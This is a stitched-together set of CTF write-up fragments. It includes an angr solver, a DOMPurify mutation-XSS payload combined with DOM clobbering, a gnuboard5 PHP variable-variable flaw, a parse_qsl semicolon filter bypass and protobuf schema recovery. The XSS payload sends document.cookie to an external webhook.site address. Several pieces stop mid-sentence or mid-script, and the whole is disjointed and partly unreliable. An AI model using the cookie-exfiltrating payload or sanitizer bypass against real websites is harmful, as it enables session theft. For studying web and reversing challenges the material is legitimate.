by sqrtrev
#Code by sqrtrev@WreckTheLine
import angr

def main():
    # Load the challenge binary and start from a fully initialised state
    p = angr.Project("reversing")
    simgr = p.factory.simulation_manager(p.factory.full_init_state())
    # Explore until some path prints "correct" on stdout (fd 1)
    simgr.explore(find=lambda s: b'correct' in s.posix.dumps(1))
    # Return the stdin (fd 0) that drives execution down that path
    return simgr.found[0].posix.dumps(0)

if __name__ == "__main__":
    print(main())
Craft the URL via DOM clobbering, and get XSS via a DOMPurify 0-day (now patched: https://github.com/cure53/DOMPurify/commit/02724b8eb048dd219d6725b05c3000936f11d62d ).
DOM clobbering part (two anchors with the same id turn `a` into an HTMLCollection, so `a.b.href` resolves to the href of the second anchor, the one with name=b):
[<a id=a><a id=a name=b href="//webhook.site/f43558da-640a-4ad3-817e-6144d4bc2e7d/" />]
mXSS payload that bypassed DOMPurify and exfiltrates the cookie to the clobbered URL:
<math><mtext><table><mglyph><style><math><table id="</table>"><img src onerror=location.href=a.b.href+document.cookie">
# python2
# 0-day by Merona-Hunters (SeungHyun Kim, SeungJun Kim, MinKi Jang, DoHyun Lee)
POST /submit HTTP/1.1
Host: webp.bcactf.com:49153
Content-Length: 985
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://webp.bcactf.com:49153
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.272 Whale/2.9.118.16 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://webp.bcactf.com:49153/
Looking at https://github.com/gnuboard/gnuboard5/blob/master/shop/kakaopay/pc_pay_result.php#L65, the code uses the HttpClient class to make a request to $authUrl. Here $authUrl comes from $_REQUEST (https://github.com/gnuboard/gnuboard5/blob/master/shop/kakaopay/pc_pay_result.php#L33), so it is a value we control. At https://github.com/gnuboard/gnuboard5/blob/master/shop/kakaopay/pc_pay_result.php#L176 the request is sent and, if it fails, the response body is stored in $netcancelResultString. Then, at https://github.com/gnuboard/gnuboard5/blob/master/shop/kakaopay/pc_pay_result.php#L186-L187, str_replace is applied, and this is where the vulnerability arises. Because of how PHP variable variables work, using a value in the form $$var behaves the same as referencing $<contents of var>. So the first str_replace is made to refer to the contents of $body, and the second str_replace then reaches whichever variable we want. Since $authToken is a value we control (https://github.com/gnuboard/gnuboard5/blob/master/shop/kakaopay/pc_pay_result.php#L31), we chose that variable. Suppose we send authToken=flag and HttpClient->body returns authToken. During the str_replace step, $$Http->body == $authToken will hold. In other words, `$netca
We can save the payload in the username (or somewhere else) and then execute it by reading /proc/self/mem. Run both scripts at the same time: one injects the payloads, the other searches memory for them. Since we are reading memory, some of the links the script outputs may already have expired.
#!/usr/bin/env python3
import requests
# target = 'http://localhost:8002'
target = 'http://35.243.100.112'
# target = 'http://localhost:10100'
Using STTF (scroll-to-text fragment) together with the nginx cache header, we can leak the admin's flag.
#!/usr/bin/env python3
import requests
import random
import time
target = 'http://35.187.204.223'
rfile = open('./a','r') #a has nothing interesting
We can create extra query variables using `;`, so we can bypass the filtering (the server uses parse_qsl to read the query string, which also splits on `;`).
Payload:
/view?{MyClienID}=flag;/%2e%2e/=123
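To make the parser differential concrete, here is an added Python example (not code from the original writeup). It contrasts a hypothetical front-end filter that only splits on `&` with a backend that hands the same query string to parse_qsl with `;` as a separator. Older Python versions split on `;` by default (changed in CVE-2021-23336); the example passes separator=";" explicitly so the behaviour is the same on current interpreters. The client id and the deny-list rule are assumptions for illustration.

```python
from urllib.parse import parse_qsl, unquote

# Constructed sample modelled on the page's payload; CLIENT_ID is a placeholder.
CLIENT_ID = "client123"
QUERY = f"{CLIENT_ID}=flag;/%2e%2e/=123"


def naive_params(qs):
    """What an '&'-only parser (e.g. a front-end filter) sees: one key, one value."""
    out = []
    for part in qs.split("&"):
        if not part:
            continue
        key, _, value = part.partition("=")
        out.append((unquote(key), unquote(value)))
    return out


def blocked_by_filter(qs):
    """Hypothetical deny-list: reject any parameter *key* containing '..',
    judged on the '&'-only view of the query string."""
    return any(".." in key for key, _ in naive_params(qs))


def server_params(qs):
    """What the backend sees: each '&'-chunk is further split on ';' by parse_qsl,
    reproducing the pre-CVE-2021-23336 default of treating both as separators."""
    pairs = []
    for chunk in qs.split("&"):
        pairs.extend(parse_qsl(chunk, separator=";"))
    return pairs


def demo(qs=QUERY):
    """Return (filter verdict, backend view) for the constructed query."""
    return blocked_by_filter(qs), server_params(qs)


if __name__ == "__main__":
    blocked, seen = demo()
    print("filter blocked:", blocked)      # False: the filter sees one harmless key
    for key, value in seen:                # backend sees a second key "/../"
        print(f"backend param {key!r} = {value!r}")
```

The filter only ever inspects the key `client123`; the `%2e%2e` traversal sequence is hidden inside its value. Once parse_qsl splits on `;`, the same bytes become a second parameter whose decoded key is `/../`, which is the value the page's payload smuggles past the check.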
(Written by okas832 and Reinose. I just uploaded this)
We need to serialize the message with protobuf to send data, but the protocol.proto file is not given.
The serialized descriptor_pb2.FileDescriptorProto is at 0x416700:0x4168B0.
We recovered protocol.proto with blackbox analysis because we couldn't find any related documents.
0A 0E 70 72 6F 74 6F 63 6F 6C 2E 70 72 6F 74 6F    field 1 (name), length 0x0E: "protocol.proto"
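Recovering the .proto from an embedded descriptor can be done without the original schema, because a serialized FileDescriptorProto is itself just protobuf wire format. The following is an added Python example (not the writeup's own tooling): a small wire-format walker plus a decoder for the descriptor fields that matter (file name, package, message names, field names/numbers/labels/types), rendering them back as .proto text. The sample descriptor is constructed inline; its first 16 bytes are exactly the ones dumped on the page, and the package and message layout after that are invented for illustration.

```python
import struct

# ---- minimal encoders, used only to build the constructed sample ----
def enc_varint(n):
    out = bytearray()
    while True:
        b, n = n & 0x7F, n >> 7
        out.append(b | 0x80 if n else b)
        if not n:
            return bytes(out)

def enc_len(num, payload):          # wire type 2: length-delimited
    return enc_varint((num << 3) | 2) + enc_varint(len(payload)) + payload

def enc_int(num, value):            # wire type 0: varint
    return enc_varint(num << 3) + enc_varint(value)

# FieldDescriptorProto: 1 name, 3 number, 4 label, 5 type, 6 type_name
def field_desc(name, number, label, ftype):
    return enc_len(1, name) + enc_int(3, number) + enc_int(4, label) + enc_int(5, ftype)

# Constructed FileDescriptorProto (1 name, 2 package, 4 message_type).
# The leading 16 bytes match the dump on the page; the rest is made up.
SAMPLE = (
    enc_len(1, b"protocol.proto")
    + enc_len(2, b"ctf")
    + enc_len(4, enc_len(1, b"Request")                      # DescriptorProto: 1 name, 2 field
             + enc_len(2, field_desc(b"username", 1, 1, 9))  # optional string
             + enc_len(2, field_desc(b"token", 2, 1, 12))    # optional bytes
             + enc_len(2, field_desc(b"ids", 3, 3, 5)))      # repeated int32
)

# ---- generic wire-format walker ----
def read_varint(buf, pos):
    shift = result = 0
    while True:
        b = buf[pos]
        pos += 1
        result |= (b & 0x7F) << shift
        if not b & 0x80:
            return result, pos
        shift += 7

def parse_fields(buf):
    """Return [(field_number, wire_type, raw_value)] for one message."""
    pos, fields = 0, []
    while pos < len(buf):
        key, pos = read_varint(buf, pos)
        num, wt = key >> 3, key & 7
        if wt == 0:
            val, pos = read_varint(buf, pos)
        elif wt == 1:
            val, pos = struct.unpack_from("<Q", buf, pos)[0], pos + 8
        elif wt == 2:
            ln, pos = read_varint(buf, pos)
            val, pos = bytes(buf[pos:pos + ln]), pos + ln
        elif wt == 5:
            val, pos = struct.unpack_from("<I", buf, pos)[0], pos + 4
        else:
            raise ValueError(f"unsupported wire type {wt} at offset {pos}")
        fields.append((num, wt, val))
    return fields

# ---- descriptor-specific decoding ----
TYPE_NAMES = {1: "double", 2: "float", 3: "int64", 4: "uint64", 5: "int32", 6: "fixed64",
              7: "fixed32", 8: "bool", 9: "string", 12: "bytes", 13: "uint32",
              15: "sfixed32", 16: "sfixed64", 17: "sint32", 18: "sint64"}
LABELS = {1: "optional", 2: "required", 3: "repeated"}

def decode_field(buf):
    d = {"name": None, "number": None, "label": 1, "type": None, "type_name": None}
    for num, _, val in parse_fields(buf):
        if num == 1: d["name"] = val.decode()
        elif num == 3: d["number"] = val
        elif num == 4: d["label"] = val
        elif num == 5: d["type"] = val
        elif num == 6: d["type_name"] = val.decode()   # ".pkg.Msg" for message/enum types
    return d

def decode_message(buf):
    m = {"name": None, "fields": []}
    for num, _, val in parse_fields(buf):
        if num == 1: m["name"] = val.decode()
        elif num == 2: m["fields"].append(decode_field(val))
    return m

def decode_file(buf):
    f = {"name": None, "package": None, "syntax": None, "messages": []}
    for num, _, val in parse_fields(buf):
        if num == 1: f["name"] = val.decode()
        elif num == 2: f["package"] = val.decode()
        elif num == 4: f["messages"].append(decode_message(val))
        elif num == 12: f["syntax"] = val.decode()
    return f

def render_proto(fd):
    """Emit .proto source; labels other than 'repeated' are omitted for proto3."""
    syntax = fd["syntax"] or "proto2"
    lines = [f'syntax = "{syntax}";']
    if fd["package"]:
        lines.append(f'package {fd["package"]};')
    for m in fd["messages"]:
        lines.append(f'message {m["name"]} {{')
        for fl in m["fields"]:
            tname = fl["type_name"] or TYPE_NAMES.get(fl["type"], f'/* type {fl["type"]} */')
            label = LABELS[fl["label"]]
            if syntax == "proto3" and label != "repeated":
                label = ""
            lines.append(f'  {label + " " if label else ""}{tname} {fl["name"]} = {fl["number"]};')
        lines.append("}")
    return "\n".join(lines)

if __name__ == "__main__":
    print(SAMPLE[:16].hex(" ").upper())
    print(render_proto(decode_file(SAMPLE)))
```

Against a real binary you would replace SAMPLE with the bytes carved from the address range the page gives (0x416700:0x4168B0) and feed the output straight to protoc; nested messages, enums and options live in other descriptor fields and would need the same treatment.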